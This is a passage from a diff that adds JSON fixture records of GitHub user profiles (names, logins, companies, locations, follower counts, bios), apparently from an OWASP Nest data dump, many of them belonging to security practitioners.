"bio": "Security Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 276, + "fields": { + "nest_created_at": "2024-09-11T21:08:35.804Z", + "nest_updated_at": "2024-09-11T21:08:35.804Z", + "name": "Joshua Lock", + "login": "joshuagl", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13888612?v=4", + "company": "Verizon", + "location": "UK", + "collaborators_count": 0, + "following_count": 25, + "followers_count": 83, + "public_gists_count": 10, + "public_repositories_count": 64, + "created_at": "2015-08-20T14:34:59Z", + "updated_at": "2024-08-21T09:48:40Z", + "node_id": "MDQ6VXNlcjEzODg4NjEy", + "bio": "Work on software supply chain security standards and tools ☂️📦 (TUF) / 💃 (SLSA) / 🔗 (in-toto) / ✍️ (Sigstore).\r\nPreviously worked on OE/YP.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 277, + "fields": { + "nest_created_at": "2024-09-11T21:08:36.617Z", + "nest_updated_at": "2024-09-22T18:51:15.952Z", + "name": "Mattt", + "login": "mattt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7659?v=4", + "company": "@replicate", + "location": "Portland, OR", + "collaborators_count": 0, + "following_count": 385, + "followers_count": 17989, + "public_gists_count": 57, + "public_repositories_count": 92, + "created_at": "2008-04-17T03:18:54Z", + "updated_at": "2024-09-18T16:31:20Z", + "node_id": "MDQ6VXNlcjc2NTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "mattt" + } +}, +{ + "model": "github.user", + "pk": 278, + "fields": { + "nest_created_at": "2024-09-11T21:08:37.433Z", + "nest_updated_at": "2024-09-22T17:41:08.015Z", + "name": "Mrinal Wadhwa", + "login": "mrinalwadhwa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/159583?v=4", + "company": "Ockam", + "location": "", + "collaborators_count": 0, + "following_count": 167, + "followers_count": 194, + "public_gists_count": 29, + "public_repositories_count": 40, + "created_at": "2009-11-29T20:52:03Z", + "updated_at": "2024-08-29T08:01:18Z", + "node_id": "MDQ6VXNlcjE1OTU4Mw==", + "bio": "CTO @ Ockam", + "is_hireable": false, + "twitter_username": "mrinal" + } +}, +{ + "model": "github.user", + "pk": 279, + "fields": { + "nest_created_at": "2024-09-11T21:08:53.171Z", + "nest_updated_at": "2024-09-13T04:19:24.718Z", + "name": "Julio Lira", + "login": "Jul10l1r4", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32502168?v=4", + "company": "@libreflix ", + "location": "Rio grande do norte", + "collaborators_count": 0, + "following_count": 38, + "followers_count": 88, + "public_gists_count": 57, + "public_repositories_count": 94, + "created_at": "2017-10-04T01:36:57Z", + "updated_at": "2023-11-06T14:15:14Z", + "node_id": "MDQ6VXNlcjMyNTAyMTY4", + "bio": "\r\n Maluco dos OSINTs, OWASP chapter leader, louco por SysOps e WebSec. Prefiro usar o libregit.org do que isso aqui. Mas colo lá p meus projetos pessoais\r\n", + "is_hireable": true, + "twitter_username": "julioliraup" + } +}, +{ + "model": "github.user", + "pk": 280, + "fields": { + "nest_created_at": "2024-09-11T21:09:12.073Z", + "nest_updated_at": "2024-09-22T17:41:35.835Z", + "name": "Osqui LittleRiver", + "login": "q2dg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7274874?v=4", + "company": "", + "location": "Barcelona (Spain)", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 29, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-04-12T18:20:13Z", + "updated_at": "2024-04-26T13:53:35Z", + "node_id": "MDQ6VXNlcjcyNzQ4NzQ=", + "bio": "I'm a person", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 281, + "fields": { + "nest_created_at": "2024-09-11T21:09:12.901Z", + "nest_updated_at": "2024-09-11T21:09:12.901Z", + "name": "Andriy Zhyshkovych", + "login": "ANDREW-LVIV", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25088647?v=4", + "company": "", + "location": "Ukraine, Lviv", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2017-01-12T20:31:40Z", + "updated_at": "2023-12-31T14:34:00Z", + "node_id": "MDQ6VXNlcjI1MDg4NjQ3", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 282, + "fields": { + "nest_created_at": "2024-09-11T21:09:21.039Z", + "nest_updated_at": "2024-09-22T17:41:46.019Z", + "name": "Sven Vetsch", + "login": "disenchant", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/686611?v=4", + "company": "", + "location": "Switzerland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 18, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2011-03-23T17:31:55Z", + "updated_at": "2024-07-07T14:06:51Z", + "node_id": "MDQ6VXNlcjY4NjYxMQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "disenchant" + } +}, +{ + "model": "github.user", + "pk": 283, + "fields": { + "nest_created_at": "2024-09-11T21:09:25.137Z", + "nest_updated_at": "2024-09-22T20:21:47.085Z", + "name": "Manh Pham Tien", + "login": "ManhNho", + "email": "manh.pham@cypeace.net", + "avatar_url": "https://avatars.githubusercontent.com/u/29980312?v=4", + "company": "", + "location": "Ha Noi - Viet Nam", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 172, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2017-07-07T13:28:51Z", + "updated_at": "2024-08-07T12:56:08Z", + "node_id": "MDQ6VXNlcjI5OTgwMzEy", + "bio": "Security Engineer", + "is_hireable": true, + "twitter_username": "manhnho" + } +}, +{ + "model": "github.user", + "pk": 284, + "fields": { + "nest_created_at": "2024-09-11T21:09:35.030Z", + "nest_updated_at": "2024-09-22T20:27:10.679Z", + "name": "Sri Harsha", + "login": "hardlyhuman", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20636425?v=4", + "company": "Intel AI", + "location": "Pune", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 108, + "public_gists_count": 1, + "public_repositories_count": 179, + "created_at": "2016-07-25T06:54:10Z", + "updated_at": "2024-09-12T23:38:55Z", + "node_id": "MDQ6VXNlcjIwNjM2NDI1", + "bio": "I'm making machines teach & learn | Lead, AI Research | AI & CyberSecurity consultant and Trainer", + "is_hireable": true, + "twitter_username": "Sri_HarshaG" + } +}, +{ + "model": "github.user", + "pk": 285, + "fields": { + "nest_created_at": "2024-09-11T21:09:39.272Z", + "nest_updated_at": "2024-09-11T21:09:39.272Z", + "name": "Ashish Malik", + "login": "ashish493", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44671044?v=4", + "company": "", + "location": "India", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 35, + "public_gists_count": 0, + "public_repositories_count": 29, + "created_at": "2018-11-01T11:50:14Z", + "updated_at": "2024-04-29T10:11:45Z", + "node_id": "MDQ6VXNlcjQ0NjcxMDQ0", + "bio": "GSoC'21 @casbin, GSoC'20 @OWASP\r\nBackend-Dev, Security. ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 286, + "fields": { + "nest_created_at": "2024-09-11T21:09:40.105Z", + "nest_updated_at": "2024-09-11T21:09:40.105Z", + "name": "Hitesh Tomar", + "login": "lkbhitesh07", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44300735?v=4", + "company": "", + "location": "Bikaner,Rajasthan,India", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 30, + "created_at": "2018-10-19T17:08:21Z", + "updated_at": "2024-06-26T20:12:45Z", + "node_id": "MDQ6VXNlcjQ0MzAwNzM1", + "bio": "Backend@NuFlights || Contributor@Oppia", + "is_hireable": true, + "twitter_username": "lkbhitesh07" + } +}, +{ + "model": "github.user", + "pk": 287, + "fields": { + "nest_created_at": "2024-09-11T21:09:40.927Z", + "nest_updated_at": "2024-09-22T20:25:57.604Z", + "name": "Aman Kumar", + "login": "amanpro30", + "email": "aman.k17@iiits.in", + "avatar_url": "https://avatars.githubusercontent.com/u/37950602?v=4", + "company": "", + "location": "Sri City", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 42, + "created_at": "2018-03-31T07:12:21Z", + "updated_at": "2023-02-01T12:06:22Z", + "node_id": "MDQ6VXNlcjM3OTUwNjAy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 288, + "fields": { + "nest_created_at": "2024-09-11T21:09:53.819Z", + "nest_updated_at": "2024-09-22T20:27:26.330Z", + "name": "", + "login": "IgorSasovets", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/27974884?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 148, + "followers_count": 40, + "public_gists_count": 5, + "public_repositories_count": 60, + "created_at": "2017-04-24T20:06:26Z", + "updated_at": "2024-09-22T14:29:58Z", + "node_id": "MDQ6VXNlcjI3OTc0ODg0", + "bio": "Security, automation engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 289, + "fields": { + "nest_created_at": "2024-09-11T21:09:54.230Z", + "nest_updated_at": "2024-09-22T20:28:30.689Z", + "name": "Erez Yalon", + "login": "ErezYalon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11692285?v=4", + "company": "@Checkmarx", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 73, + "public_gists_count": 5, + "public_repositories_count": 12, + "created_at": "2015-03-28T09:02:24Z", + "updated_at": "2024-07-25T10:39:58Z", + "node_id": "MDQ6VXNlcjExNjkyMjg1", + "bio": "VP of Security Research @Checkmarx \r\nFounder at @AppSecVillage\r\nProject Leader @OWASP ", + "is_hireable": false, + "twitter_username": "ErezYalon" + } +}, +{ + "model": "github.user", + "pk": 290, + "fields": { + "nest_created_at": "2024-09-11T21:09:55.477Z", + "nest_updated_at": "2024-09-11T21:09:55.882Z", + "name": "Leonel Quinteros", + "login": "leonelquinteros", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/155026?v=4", + "company": "Amazon Ring", + "location": "Buenos Aires, Argentina", + "collaborators_count": 0, + "following_count": 44, + "followers_count": 42, + "public_gists_count": 3, + "public_repositories_count": 36, + "created_at": "2009-11-18T20:34:41Z", + "updated_at": "2024-06-05T13:57:19Z", + "node_id": "MDQ6VXNlcjE1NTAyNg==", + "bio": "This is some of my code. I have more, but isn't here. ", + "is_hireable": true, + "twitter_username": "peiiion" + } +}, +{ + "model": "github.user", + "pk": 291, + "fields": { + "nest_created_at": "2024-09-11T21:09:56.281Z", + "nest_updated_at": "2024-09-22T20:29:58.826Z", + "name": "PauloASilva", + "login": "PauloASilva", + "email": "pauloasilva@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2962581?v=4", + "company": "", + "location": "Portugal", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 90, + "public_gists_count": 1, + "public_repositories_count": 44, + "created_at": "2012-12-04T14:54:15Z", + "updated_at": "2024-08-31T08:54:51Z", + "node_id": "MDQ6VXNlcjI5NjI1ODE=", + "bio": "Freedom enthusiast\r\n • FOSS - Free Open Source Software\r\n • WWW - World Wide Web\r\n • XC - Cross Country (MTB Raids)", + "is_hireable": true, + "twitter_username": "pauloasilva_com" + } +}, +{ + "model": "github.user", + "pk": 292, + "fields": { + "nest_created_at": "2024-09-11T21:09:57.976Z", + "nest_updated_at": "2024-09-11T21:09:58.377Z", + "name": "", + "login": "ch4rl353y", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/69649094?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-08-13T19:09:42Z", + "updated_at": "2023-08-17T21:28:09Z", + "node_id": "MDQ6VXNlcjY5NjQ5MDk0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 293, + "fields": { + "nest_created_at": "2024-09-11T21:10:00.072Z", + "nest_updated_at": "2024-09-11T21:10:00.481Z", + "name": "E Dirks", + "login": "defixje", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1568058?v=4", + "company": "", + "location": "Netherlands", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2012-03-23T12:51:14Z", + "updated_at": "2024-07-10T11:45:16Z", + "node_id": "MDQ6VXNlcjE1NjgwNTg=", + "bio": "Software Engineer and Ethical Hacker", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 294, + "fields": { + "nest_created_at": "2024-09-11T21:10:02.255Z", + "nest_updated_at": "2024-09-11T21:10:02.658Z", + "name": "Dongdong Yang", + "login": "donge", + "email": "donge@donge.org", + "avatar_url": "https://avatars.githubusercontent.com/u/1329129?v=4", + "company": "Juniper Networks", + "location": "Beijing", + "collaborators_count": 0, + "following_count": 84, + "followers_count": 42, + "public_gists_count": 0, + "public_repositories_count": 46, + "created_at": "2012-01-14T00:09:43Z", + "updated_at": "2024-03-08T07:43:40Z", + "node_id": "MDQ6VXNlcjEzMjkxMjk=", + "bio": "to be fool stack", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 295, + "fields": { + "nest_created_at": "2024-09-11T21:10:04.351Z", + "nest_updated_at": "2024-09-11T21:10:04.739Z", + "name": "Özgün Kültekin", + "login": "oz9un", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57866851?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 28, + "public_gists_count": 6, + "public_repositories_count": 26, + "created_at": "2019-11-17T14:29:45Z", + "updated_at": "2024-08-26T13:50:01Z", + "node_id": "MDQ6VXNlcjU3ODY2ODUx", + "bio": "breaking things since 2k", + "is_hireable": false, + "twitter_username": "oz9un" + } +}, +{ + "model": "github.user", + "pk": 296, + "fields": { + "nest_created_at": "2024-09-11T21:10:08.463Z", + "nest_updated_at": "2024-09-11T21:10:08.463Z", + "name": "Revathi Selvaraj", + "login": "SpringRev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9447021?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 20, + "created_at": "2014-10-29T12:47:21Z", + "updated_at": "2024-06-24T10:37:19Z", + "node_id": "MDQ6VXNlcjk0NDcwMjE=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 297, + "fields": { + "nest_created_at": "2024-09-11T21:10:09.314Z", + "nest_updated_at": "2024-09-22T19:48:01.587Z", + "name": "Mat", + "login": "mtausig", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1511226?v=4", + "company": "", + "location": "Austria", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 22, + "created_at": "2012-03-07T11:52:44Z", + "updated_at": "2024-09-01T09:37:55Z", + "node_id": "MDQ6VXNlcjE1MTEyMjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 298, + "fields": { + "nest_created_at": "2024-09-11T21:10:11.021Z", + "nest_updated_at": "2024-09-22T20:27:22.802Z", + "name": "Mohammad Reza Ismaeli Taba", + "login": "This-is-Neo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/102599193?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-03-29T12:49:31Z", + "updated_at": "2024-09-15T07:48:29Z", + "node_id": "U_kgDOBh2KGQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 299, + "fields": { + "nest_created_at": "2024-09-11T21:10:13.175Z", + "nest_updated_at": "2024-09-22T20:27:26.968Z", + "name": "Hack Disciple", + "login": "RiuSalvi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11950757?v=4", + "company": "", + "location": "Portugal", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2015-04-14T21:07:35Z", + "updated_at": "2024-09-10T22:00:54Z", + "node_id": "MDQ6VXNlcjExOTUwNzU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 300, + "fields": { + "nest_created_at": "2024-09-11T21:10:15.247Z", + "nest_updated_at": "2024-09-11T21:10:15.247Z", + "name": "regne", + "login": "luca-regne", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45595378?v=4", + "company": "@Unidade37", + "location": "", + "collaborators_count": 0, + "following_count": 133, + "followers_count": 91, + "public_gists_count": 3, + "public_repositories_count": 37, + "created_at": "2018-12-04T12:07:45Z", + "updated_at": "2024-08-10T15:09:40Z", + "node_id": "MDQ6VXNlcjQ1NTk1Mzc4", + "bio": "hack all the things", + "is_hireable": false, + "twitter_username": "_regne" + } +}, +{ + "model": "github.user", + "pk": 301, + "fields": { + "nest_created_at": "2024-09-11T21:10:16.986Z", + "nest_updated_at": "2024-09-16T20:59:37.238Z", + "name": "", + "login": "g0tRoob", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19971185?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-06-16T08:54:43Z", + "updated_at": "2024-08-30T08:28:17Z", + "node_id": "MDQ6VXNlcjE5OTcxMTg1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 302, + "fields": { + "nest_created_at": "2024-09-11T21:10:29.601Z", + "nest_updated_at": "2024-09-22T20:25:21.482Z", + "name": "Ron Perris", + "login": "ronperris", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/963451?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 34, + "created_at": "2011-08-06T18:56:03Z", + "updated_at": "2024-09-14T14:33:49Z", + "node_id": "MDQ6VXNlcjk2MzQ1MQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 303, + "fields": { + "nest_created_at": "2024-09-11T21:10:33.820Z", + "nest_updated_at": "2024-09-22T20:22:27.296Z", + "name": "", + "login": "tuckerww", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39139260?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-05-09T21:43:13Z", + "updated_at": "2024-01-15T18:23:54Z", + "node_id": "MDQ6VXNlcjM5MTM5MjYw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 304, + "fields": { + "nest_created_at": "2024-09-11T21:10:38.073Z", + "nest_updated_at": "2024-09-11T21:10:38.073Z", + "name": "James A Rosen", + "login": "jamesarosen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2406?v=4", + "company": "Clarasight PBC", + "location": "Bay Area, CA", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 146, + "public_gists_count": 168, + "public_repositories_count": 145, + "created_at": "2008-03-06T16:41:08Z", + "updated_at": "2024-08-25T21:07:37Z", + "node_id": "MDQ6VXNlcjI0MDY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 305, + "fields": { + "nest_created_at": "2024-09-11T21:10:40.196Z", + "nest_updated_at": "2024-09-11T21:10:40.196Z", + "name": "David Glasser", + "login": "glasser", + "email": "glasser@davidglasser.net", + "avatar_url": "https://avatars.githubusercontent.com/u/16724?v=4", + "company": "Apollo Graph", + "location": "Berkeley, CA", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 496, + "public_gists_count": 32, + "public_repositories_count": 174, + "created_at": "2008-07-10T22:58:05Z", + "updated_at": "2024-08-16T20:44:43Z", + "node_id": "MDQ6VXNlcjE2NzI0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 306, + "fields": { + "nest_created_at": "2024-09-11T21:10:42.289Z", + "nest_updated_at": "2024-09-22T20:23:40.406Z", + "name": "JonZeolla", + "login": "JonZeolla", + "email": "Zeolla@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1385510?v=4", + "company": "@SeisoLLC ", + "location": "Pittsburgh, PA", + "collaborators_count": 0, + "following_count": 66, + "followers_count": 98, + "public_gists_count": 11, + "public_repositories_count": 128, + "created_at": "2012-01-27T17:52:56Z", + "updated_at": "2024-09-12T14:53:28Z", + "node_id": "MDQ6VXNlcjEzODU1MTA=", + "bio": "Cloud Native Security & Compliance", + "is_hireable": false, + "twitter_username": "jonzeolla" + } +}, +{ + "model": "github.user", + "pk": 307, + "fields": { + "nest_created_at": "2024-09-11T21:10:44.387Z", + "nest_updated_at": "2024-09-11T21:10:44.387Z", + "name": "", + "login": "alex-mayorga", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/649262?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 10, + "created_at": "2011-03-03T15:58:11Z", + "updated_at": "2024-08-18T13:30:27Z", + "node_id": "MDQ6VXNlcjY0OTI2Mg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 308, + "fields": { + "nest_created_at": "2024-09-11T21:10:45.188Z", + "nest_updated_at": "2024-09-22T20:28:02.129Z", + "name": "Kevin W. Wall", + "login": "kwwall", + "email": "kevin.w.wall@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1959835?v=4", + "company": "Verisign", + "location": "Central OH, USA", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 55, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2012-07-12T00:28:09Z", + "updated_at": "2024-06-29T17:37:50Z", + "node_id": "MDQ6VXNlcjE5NTk4MzU=", + "bio": "ESAPI project co-lead; senior application security engineer at Verisign.", + "is_hireable": true, + "twitter_username": "KevinWWall" + } +}, +{ + "model": "github.user", + "pk": 309, + "fields": { + "nest_created_at": "2024-09-11T21:10:47.338Z", + "nest_updated_at": "2024-09-11T21:10:47.338Z", + "name": "", + "login": "madelson", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1269046?v=4", + "company": "@Mastercard ", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 125, + "public_gists_count": 8, + "public_repositories_count": 47, + "created_at": "2011-12-17T01:13:12Z", + "updated_at": "2024-09-03T11:22:55Z", + "node_id": "MDQ6VXNlcjEyNjkwNDY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 310, + "fields": { + "nest_created_at": "2024-09-11T21:10:49.513Z", + "nest_updated_at": "2024-09-22T20:21:32.635Z", + "name": "Lars ", + "login": "advename", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32460418?v=4", + "company": "", + "location": "Copenhagen", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 11, + "public_gists_count": 2, + "public_repositories_count": 53, + "created_at": "2017-10-02T15:29:19Z", + "updated_at": "2024-03-21T07:26:49Z", + "node_id": "MDQ6VXNlcjMyNDYwNDE4", + "bio": "Interested in security, scalable & high-performance applications, HQ documentation, contributing to open source and creating more bugs!", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 311, + "fields": { + "nest_created_at": "2024-09-11T21:10:51.642Z", + "nest_updated_at": "2024-09-11T21:10:51.642Z", + "name": "", + "login": "dsmhood", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43904163?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-10-06T08:56:27Z", + "updated_at": "2023-11-14T22:56:15Z", + "node_id": "MDQ6VXNlcjQzOTA0MTYz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 312, + "fields": { + "nest_created_at": "2024-09-11T21:10:54.152Z", + "nest_updated_at": "2024-09-22T20:25:30.461Z", + "name": "Jet Anderson", + "login": "thatsjet", + "email": "janderson@miletwo.net", + "avatar_url": "https://avatars.githubusercontent.com/u/2159033?v=4", + "company": "", + "location": "Portland, Oregon, USA", + "collaborators_count": 0, + "following_count": 91, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2012-08-15T20:24:13Z", + "updated_at": "2024-07-08T17:58:58Z", + "node_id": "MDQ6VXNlcjIxNTkwMzM=", + "bio": "Hi, I'm Jet! My passion is teaching today's software developers to write secure code as part of modern DevOps pipelines, at speed, and at scale.", + "is_hireable": false, + "twitter_username": "thatsjet" + } +}, +{ + "model": "github.user", + "pk": 313, + "fields": { + "nest_created_at": "2024-09-11T21:10:59.859Z", + "nest_updated_at": "2024-09-11T21:11:00.247Z", + "name": "Kamil Jeřábek", + "login": "kjerabek", + "email": "jerabek.kamil@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9026239?v=4", + "company": "NES@FIT", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2014-10-05T14:00:04Z", + "updated_at": "2024-09-09T07:31:48Z", + "node_id": "MDQ6VXNlcjkwMjYyMzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 314, + "fields": { + "nest_created_at": "2024-09-11T21:11:04.021Z", + "nest_updated_at": "2024-09-22T20:25:15.526Z", + "name": "Gabriel Corona", + "login": "randomstuff", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/946727?v=4", + "company": "", + "location": "Nancy, France", + "collaborators_count": 0, + "following_count": 90, + "followers_count": 48, + "public_gists_count": 1, + "public_repositories_count": 36, + "created_at": "2011-07-29T12:53:15Z", + "updated_at": "2024-08-13T13:01:01Z", + "node_id": "MDQ6VXNlcjk0NjcyNw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 315, + "fields": { + "nest_created_at": "2024-09-11T21:11:06.129Z", + "nest_updated_at": "2024-09-22T20:25:21.173Z", + "name": "Ralph Andalis", + "login": "csfreak92", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4002765?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2013-03-29T05:35:46Z", + "updated_at": "2024-08-02T07:28:17Z", + "node_id": "MDQ6VXNlcjQwMDI3NjU=", + "bio": "Security Researcher | Pentester | Ex-NCC | Ex-Fortify | OWASP ASVS Working Group Member", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 316, + "fields": { + "nest_created_at": "2024-09-11T21:11:08.213Z", + "nest_updated_at": "2024-09-11T21:11:08.213Z", + "name": "Franklin Ross", + "login": "franklin-ross", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2695677?v=4", + "company": "@blstrco ", + "location": "Australia", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 5, + "public_gists_count": 3, + "public_repositories_count": 12, + "created_at": "2012-11-01T02:00:12Z", + "updated_at": "2024-08-29T05:50:44Z", + "node_id": "MDQ6VXNlcjI2OTU2Nzc=", + "bio": "People|Code|Glitter", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 317, + "fields": { + "nest_created_at": "2024-09-11T21:11:10.368Z", + "nest_updated_at": "2024-09-12T01:13:48.048Z", + "name": "Christopher R Halbersma", + "login": "chalbersma", + "email": "chalbersma.12@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4132673?v=4", + "company": "N/A", + "location": "United States", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 8, + "public_gists_count": 3, + "public_repositories_count": 72, + "created_at": "2013-04-12T02:57:10Z", + "updated_at": "2024-08-30T16:40:26Z", + "node_id": "MDQ6VXNlcjQxMzI2NzM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 318, + "fields": { + "nest_created_at": "2024-09-11T21:11:12.491Z", + "nest_updated_at": "2024-09-11T21:11:12.895Z", + "name": "Srinivasan Raghavan", + "login": "rsrinivasanhome", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31912418?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-09-13T04:34:52Z", + "updated_at": "2023-04-13T08:45:26Z", + "node_id": "MDQ6VXNlcjMxOTEyNDE4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 319, + "fields": { + "nest_created_at": "2024-09-11T21:11:14.601Z", + "nest_updated_at": "2024-09-11T21:11:14.602Z", + "name": "Craig J. Bass", + "login": "craigjbass", + "email": "craig@madetech.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1889973?v=4", + "company": "@madetech ", + "location": "London, UK", + "collaborators_count": 0, 